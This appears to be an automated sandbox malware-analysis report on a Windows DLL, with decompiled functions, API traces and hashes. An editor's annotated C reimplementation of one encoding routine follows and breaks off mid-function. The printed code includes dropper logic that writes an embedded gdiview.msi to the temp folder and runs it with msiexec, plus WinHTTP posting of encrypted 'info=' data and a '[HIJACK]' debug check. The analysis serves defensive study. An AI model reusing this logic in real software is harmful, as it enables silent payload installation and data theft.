                                                                                                                                                				E100011A0( &_v72);
                                                                                                                                                				_v8 = 2;
                                                                                                                                                				E100011A0( &_v44);
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				E100011A0( &_v100);
                                                                                                                                                				_v8 = 0xffffffff;
                                                                                                                                                				E100011A0( &_v128);
                                                                                                                                                				 *[fs:0x0] = _v16;
                                                                                                                                                				return _a4;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                  • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                  • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                  • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                  • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                  • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                  • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                  • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                  • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                  • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                  • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                  • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                • API String ID: 728604215-152146038
                                                                                                                                                • Opcode ID: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                • Opcode Fuzzy Hash: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				char _v164;
                                                                                                                                                				intOrPtr _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				void* _t36;
                                                                                                                                                				void* _t75;
                                                                                                                                                				void* _t80;
                                                                                                                                                				void* _t81;
                                                                                                                                                
                                                                                                                                                				_t74 = __esi;
                                                                                                                                                				_t73 = __edi;
                                                                                                                                                				_t57 = __ebx;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
                                                                                                                                                				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
                                                                                                                                                				E1000CF20(__edi, _v168, 0, 0x21);
                                                                                                                                                				E1000CF20(_t73, _v176, 0, 0x10);
                                                                                                                                                				_t67 = _a4;
                                                                                                                                                				_t36 = E1000CAC0(_a4);
                                                                                                                                                				_t80 = _t75 + 0x24;
                                                                                                                                                				if(_t36 <= 0) {
                                                                                                                                                					E1000E280(_v168, "00000000000000000000000000000000");
                                                                                                                                                					_t81 = _t80 + 8;
                                                                                                                                                				} else {
                                                                                                                                                					E1001BC10( &_v164);
                                                                                                                                                					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
                                                                                                                                                					_t67 =  &_v164;
                                                                                                                                                					E1001CBC0( &_v164, _v176);
		_t81 = _t80 + 0x1c;
		_v8 = 0;
		while(_v8 < 0x10) {
			_t67 = _v168 + _v8 * 2;
			E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
			_t81 = _t81 + 0xc;
			_v8 = _v8 + 1;
		}
	}
	_push(_v176);
	E1000CA30(_t57, _t73, _t74, __eflags);
	_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
	E1000CF20(_t73, _v172, 0, 0x11);
	__eflags = _v168 + 8;
	E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
	_push(_v168);
	E1000CA30(_t57, _t73, _t74, __eflags);
	return _v172;
}
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$_strlenund_memcpy$_sprintf_strcat
• String ID: %02X$00000000000000000000000000000000
• API String ID: 796335831-606320477
• Opcode ID: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
• Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
• Opcode Fuzzy Hash: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
• Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001FC70(void* __edi, void* __eflags) {
	char _v1027;
	char _v1028;
	char _v1291;
	char _v1292;
	int _t21;

	_t29 = __edi;
	_v1292 = 0;
	E1000CF20(__edi,  &_v1291, 0, 0x103);
	_v1028 = 0;
	E1000CF20(_t29,  &_v1027, 0, 0x3ff);
	GetTempPathA(0x104,  &_v1292);
	E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
	E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
	E1001FC10( &_v1292, 0x10026888, 0x39e00);
	_t21 = PathFileExistsA( &_v1292);
	_t38 = _t21;
	if(_t21 != 0) {
		return E1001A1D0(_t38,  &_v1028);
	}
	return _t21;
}
APIs
• _memset.LIBCMT ref: 1001FC8E
• _memset.LIBCMT ref: 1001FCAB
• GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
• _strcat_s.LIBCMT ref: 1001FCD6
• _sprintf.LIBCMT ref: 1001FCF1
  • Part of subcall function 1001FC10: CreateFileA.KERNEL32(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
  • Part of subcall function 1001FC10: WriteFile.KERNEL32(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
  • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
• PathFileExistsA.SHLWAPI(00000000), ref: 1001FD19
  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
  • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
• String ID: gdiview.msi$msiexec.exe /i "%s"
• API String ID: 1459467440-729886463
• Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
• Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
• Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
• Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
Uniqueness Score: -1.00%

C-Code - Quality: 89%
E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
	intOrPtr _t31;
	void* _t35;
	void* _t47;
	void* _t49;
	intOrPtr _t51;
	void* _t52;
	intOrPtr _t53;
	intOrPtr _t55;
	intOrPtr _t57;

	_t62 = __eflags;
	_t45 = __esi;
	_t44 = __edi;
	_t36 = __ebx;
	E1001FDB0();
	E1001FF90(__ebx, __edi, __esi, __eflags, "install", "installp3", "-0.3", "46.0.0", "exe");
	_t51 = _t49 + 0x14 - 0x1c;
	_t37 = _t51;
	 *((intOrPtr*)(_t47 - 0x248)) = _t51;
	 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
	E10020180(__ebx, __edi, __esi, _t62);
	_t52 = _t51 + 0x1c;
	if(PathFileExistsA("C:\\hijack") != 0) {
		L7:
		_t53 = _t52 - 0x1c;
		 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
		 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
		E10020180(_t36, _t44, _t45, __eflags);
		_t55 = _t53 + 0x1c - 0x1c;
		 *((intOrPtr*)(_t47 - 0x250)) = _t55;
		 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "installp3");
		E1001FEA0(_t36, _t44, _t45, __eflags);
		_t57 = _t55 + 0x1c - 0x1c;
		 *((intOrPtr*)(_t47 - 0x254)) = _t57;
		 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "installp3");
		E1001FDC0(_t36, _t44, _t45, __eflags);
		_t59 = _t57 + 0x1c - 0x1c;
		 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
		 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
		E10020180(_t36, _t44, _t45, __eflags);
	} else {
		E1001A0A0();
		if(E1001A0B0(_t37) == 0 || E10019D10() != 0) {
		} else {
			_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0);
			_t52 = _t52 + 8;
			__eflags = _t35;
			if(__eflags != 0) {
				goto L7;
			} else {
			}
		}
	}
	E1001A260();
                                                                                                                                                				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                				E100011A0(_t47 - 0x28);
                                                                                                                                                				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                				return _t31;
			}

                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\hijack), ref: 10020692
                                                                                                                                                  • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DefaultExistsFilePathSystem
                                                                                                                                                • String ID: -0.3$46.0.0$C:\hijack$exe$install$installp3$status=main_start
                                                                                                                                                • API String ID: 482051434-3201047541
                                                                                                                                                • Opcode ID: 051d65800e02d229b61314b8e794e929d0b096babbc7c86b35b6e46c780172d3
                                                                                                                                                • Instruction ID: 180e9a89bd69158387d9cbec8d9a940dcb427d9c64843ce9222d1c9730998d87
                                                                                                                                                • Opcode Fuzzy Hash: 051d65800e02d229b61314b8e794e929d0b096babbc7c86b35b6e46c780172d3
                                                                                                                                                • Instruction Fuzzy Hash: AE01D178E483185FD750EFA49C4A7DE77B2DF50254F9001A8FD08A6243EB31B6908EA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                			E1002185A(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                                				void* _t60;
                                                                                                                                                				void* _t80;
                                                                                                                                                				void* _t101;
                                                                                                                                                				void* _t154;
                                                                                                                                                				void* _t156;
                                                                                                                                                				void* _t158;
                                                                                                                                                				void* _t171;
                                                                                                                                                
                                                                                                                                                				L0:
                                                                                                                                                				while(1) {
                                                                                                                                                					L0:
                                                                                                                                                					_t150 = __edi;
                                                                                                                                                					_t106 = __ebx;
                                                                                                                                                					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
                                                                                                                                                					_t60 = E100021E0(_t154 - 0xe2a4);
                                                                                                                                                					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
                                                                                                                                                					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
                                                                                                                                                						break;
                                                                                                                                                					}
                                                                                                                                                					L2:
                                                                                                                                                					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
                                                                                                                                                					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
                                                                                                                                                					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
                                                                                                                                                					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
                                                                                                                                                					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
                                                                                                                                                					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
                                                                                                                                                					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
                                                                                                                                                					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
                                                                                                                                                					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
                                                                                                                                                					_push(_t154 - 0x3d54);
                                                                                                                                                					_push(_t154 - 0xe294);
                                                                                                                                                					_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                					_t171 = _t156 + 0x7c;
                                                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
                                                                                                                                                						_t171 = _t171 + 0x10;
                                                                                                                                                					}
                                                                                                                                                					_t101 = E1000CAC0(_t154 - 0x746c);
                                                                                                                                                					_t156 = _t171 + 4;
                                                                                                                                                					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                				}
                                                                                                                                                				L5:
                                                                                                                                                				 *((char*)(_t154 - 4)) = 1;
                                                                                                                                                				E100011A0(_t154 - 0xe2dc);
                                                                                                                                                				 *((char*)(_t154 - 4)) = 0;
                                                                                                                                                				E10003010(_t154 - 0xe2a4);
                                                                                                                                                				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
                                                                                                                                                				E100011A0(_t154 - 0xe2c0);
                                                                                                                                                				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
                                                                                                                                                				 *((char*)(_t154 - 0x21c)) = 0;
                                                                                                                                                				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
                                                                                                                                                				_push( *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                				_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                				_t158 = _t156 + 0x20;
                                                                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
                                                                                                                                                					_t158 = _t158 + 0x10;
                                                                                                                                                				}
                                                                                                                                                				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
                                                                                                                                                				return  *((intOrPtr*)(_t154 - 0x14));
			}
                                                                                                                                                0x10021a36
                                                                                                                                                0x10021a43
                                                                                                                                                0x10021a48
                                                                                                                                                0x10021a4f
                                                                                                                                                0x10021a64
                                                                                                                                                0x10021a6f
                                                                                                                                                0x10021a73
                                                                                                                                                0x10021a83
                                                                                                                                                0x10021a88
                                                                                                                                                0x10021a91
                                                                                                                                                0x10021ab3
                                                                                                                                                0x10021ab8
                                                                                                                                                0x10021ab8
                                                                                                                                                0x10021acd
                                                                                                                                                0x10021ad6
                                                                                                                                                0x10021ae1

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3854912713-0
                                                                                                                                                • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				char _v16;
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				char _v24;
                                                                                                                                                				char _v36;
                                                                                                                                                				char _v292;
                                                                                                                                                				signed int _v296;
                                                                                                                                                				char _v300;
                                                                                                                                                				intOrPtr _v304;
                                                                                                                                                				char _v308;
                                                                                                                                                				intOrPtr _v312;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				char _t61;
                                                                                                                                                				char _t62;
                                                                                                                                                				signed int _t70;
                                                                                                                                                				intOrPtr _t102;
                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                				char _t115;
                                                                                                                                                				char _t116;
                                                                                                                                                				signed int _t118;
                                                                                                                                                
                                                                                                                                                				_t132 = __esi;
                                                                                                                                                				_t131 = __edi;
                                                                                                                                                				_t101 = __ebx;
                                                                                                                                                				_t61 = "rundll32"; // 0x646e7572
                                                                                                                                                				_v24 = _t61;
                                                                                                                                                				_t102 =  *0x100254e4; // 0x32336c6c
                                                                                                                                                				_v20 = _t102;
                                                                                                                                                				_t115 =  *0x100254e8; // 0x0
                                                                                                                                                				_v16 = _t115;
                                                                                                                                                				_t62 = "explorer"; // 0x6c707865
                                                                                                                                                				_v308 = _t62;
                                                                                                                                                				_t103 =  *0x100254f0; // 0x7265726f
                                                                                                                                                				_v304 = _t103;
                                                                                                                                                				_t116 =  *0x100254f4; // 0x0
                                                                                                                                                				_v300 = _t116;
                                                                                                                                                 				E1000CF20(__edi,  &_v292, 0, 0x108); // memset (API ID _memset): zero a 0x108-byte context buffer
                                                                                                                                                 				E1001F150( &_v24,  &_v292,  &_v24); // called with the "rundll32" string built above and the zeroed context
                                                                                                                                                 				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8); // memcpy-style copy of the 8 bytes "explorer" into _v36
                                                                                                                                                				_t118 = _a4;
                                                                                                                                                 				_v12 = E1000CAC0(_t118); // strlen(_a4) (API ID _strlen)
                                                                                                                                                 				_v296 = 0;
                                                                                                                                                 				// MSVC idiom for signed (len % 8): mask with 0x80000007, fix up when negative
                                                                                                                                                 				_t70 = _v12 & 0x80000007;
                                                                                                                                                 				if(_t70 < 0) {
                                                                                                                                                 					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                                 				}
                                                                                                                                                 				if(_t70 == 0) {
                                                                                                                                                 					// length already a multiple of 8: add a full extra block
                                                                                                                                                 					_t120 = _v12 + 8;
                                                                                                                                                 					__eflags = _t120;
                                                                                                                                                 					_v296 = _t120;
                                                                                                                                                 				} else {
                                                                                                                                                 					// cdq / and edx,7 / add / sar 3 is signed (len / 8); the decompiler lost the cdq and
                                                                                                                                                 					// rendered the sign mask as "_t118 & 7". The branch computes 8 + (len / 8) * 8.
                                                                                                                                                 					asm("cdq");
                                                                                                                                                 					_t120 = _t118 & 0x00000007;
                                                                                                                                                 					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
                                                                                                                                                 				}
                                                                                                                                                 				// both branches give (len / 8 + 1) * 8: the input is rounded up to an 8-byte block boundary with 1..8 bytes of padding
                                                                                                                                                 				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296); // heap-allocate the padded working buffer
                                                                                                                                                 				E1000CF20(_t131, _v8, 0, _v296); // memset to zero, so the padding bytes are zeros
                                                                                                                                                 				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4)); // copy strlen(_a4) bytes of the input into it
                                                                                                                                                 				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296); // transform the buffer in place (source and destination are both _v8) using the context in _v292
                                                                                                                                                 				asm("cdq");
                                                                                                                                                 				// 1 + (n + 2) / 3 * 4 is the base64 output size for n bytes (4 chars per 3 bytes) plus a terminator
                                                                                                                                                 				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                 				asm("cdq");
                                                                                                                                                 				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                				_t90 = _v296 + 2;
                                                                                                                                                				asm("cdq");
                                                                                                                                                 				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296); // encode the _v296 transformed bytes into the base64-sized output buffer
                                                                                                                                                 				_push(_v8);
                                                                                                                                                 				E1000CA30(_t101, _t131, _t132, _t90 % 3); // free the working buffer; the "% 3" argument is decompiler noise from the division above
                                                                                                                                                 				return _v312; // caller receives a heap-allocated, encoded copy of the (padded, transformed) input string
                                                                                                                                                			}
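The buffer-size arithmetic in E100223F0 above, reimplemented as an added example (editor's code, not the sample's and not part of the Joe Sandbox report) so that the two MSVC idioms the decompiler only half recovered, the masked signed remainder and the cdq-based signed division, can be checked against plain C. It goes beyond the listing in covering negative inputs, which the sample never passes; the table of output lengths is a property of this padding rule, not an observed artefact of the sample. Function names are the editor's.

```c
#include <stdint.h>
#include <stdio.h>

/* Editor's added example, not code from the sample or the report: the
 * buffer-length arithmetic recovered from E100223F0, written out so the
 * compiler idioms can be verified instead of read off the decompiler. */

/* `_v12 & 0x80000007`, then `(t - 1 | 0xfffffff8) + 1` when negative:
 * MSVC's branchy form of signed `x % 8`. Done in uint32_t so the INT_MIN
 * case does not overflow signed arithmetic. */
static int32_t decompiled_mod8(int32_t x)
{
    uint32_t t = (uint32_t)x & 0x80000007u;
    if ((int32_t)t < 0) {
        t = ((t - 1u) | 0xfffffff8u) + 1u;
    }
    return (int32_t)t;
}

/* `cdq ; and edx,7 ; add eax,edx ; sar eax,3`: signed `x / 8`. The
 * decompiler dropped the cdq and showed edx as `_t118 & 7`; it is the
 * sign mask of the length, not the _a4 pointer. Assumes an arithmetic
 * right shift, which mirrors the sar it reproduces. */
static int32_t decompiled_div8(int32_t x)
{
    int32_t sign_mask = -(int32_t)((uint32_t)x >> 31); /* cdq: 0 or -1 */
    int32_t bias = sign_mask & 7;                        /* and edx, 7  */
    return (x + bias) >> 3;                              /* add ; sar 3 */
}

/* _v296 in E100223F0: size of the zeroed buffer the input is copied into
 * before the in-place transform. Both branches reduce to (len / 8 + 1) * 8,
 * so 1..8 zero bytes of padding are always appended (8-byte block size). */
static uint32_t padded_len(uint32_t len)
{
    if (decompiled_mod8((int32_t)len) == 0)
        return len + 8u;
    return 8u + (uint32_t)decompiled_div8((int32_t)len) * 8u;
}

/* 1 + (n + 2) / 3 * 4: base64 of n bytes plus the NUL terminator. */
static uint32_t b64_buf_len(uint32_t n)
{
    return 1u + (n + 2u) / 3u * 4u;
}

/* Characters in the string E100223F0 returns for a `len`-byte input
 * (terminator excluded). Only the base64 lengths of multiples of 8 can
 * occur: 12, 24, 32, 44, 56, 64, ... which is a usable length filter
 * when hunting for this routine's output in captured traffic. */
static uint32_t output_chars(uint32_t len)
{
    return b64_buf_len(padded_len(len)) - 1u;
}

/* Cross-check the recovered idioms against plain C for every value in
 * [lo, hi]; returns 1 if all agree, 0 on the first mismatch. */
static int check_idioms(int32_t lo, int32_t hi)
{
    for (int32_t x = lo; x <= hi; x++) {
        if (decompiled_mod8(x) != x % 8) return 0;
        if (decompiled_div8(x) != x / 8) return 0;
        if (x >= 0 && padded_len((uint32_t)x) != ((uint32_t)x / 8u + 1u) * 8u) return 0;
    }
    return 1;
}

int main(void)
{
    /* constructed sample lengths, not values taken from the sample */
    static const uint32_t sizes[] = { 0, 1, 7, 8, 9, 15, 16, 31, 32 };
    printf("%6s %7s %9s\n", "len", "padded", "b64 chars");
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        printf("%6u %7u %9u\n", (unsigned)sizes[i],
               (unsigned)padded_len(sizes[i]), (unsigned)output_chars(sizes[i]));
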